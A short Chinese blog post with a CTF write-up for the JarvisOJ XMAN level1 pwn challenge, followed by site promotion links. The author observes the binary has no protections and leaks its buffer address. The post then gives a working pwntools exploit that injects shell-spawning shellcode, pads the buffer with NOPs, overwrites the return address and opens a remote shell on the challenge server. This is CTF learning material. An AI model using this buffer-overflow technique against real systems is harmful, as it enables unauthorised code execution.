[JarvisOj][XMAN]level1
都没开。。。
ida分析 发现返回了buf的地址
并没有自带system 或者/bin/sh
所以估计是自己写shellcode
偷个图。。。
#!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * shellcode = asm(shellcraft.sh()) io = remote('pwn2.jarvisoj.com', 9877) text = io.recvline()[14: -2] print text[14:-2] buf_addr = int(text, 16) payload = shellcode + '\x90' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr) io.send(payload) io.interactive() io.close()
分类:
pwn学习
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 智能桌面机器人:用.NET IoT库控制舵机并多方法播放表情
· Linux glibc自带哈希表的用例及性能测试
· 深入理解 Mybatis 分库分表执行原理
· 如何打造一个高并发系统?
· .NET Core GC压缩(compact_phase)底层原理浅谈
· DeepSeek火爆全网,官网宕机?本地部署一个随便玩「LLM探索」
· 开发者新选择:用DeepSeek实现Cursor级智能编程的免费方案
· 【译】.NET 升级助手现在支持升级到集中式包管理
· 独立开发经验谈:如何通过 Docker 让潜在客户快速体验你的系统
· Tinyfox 发生重大改版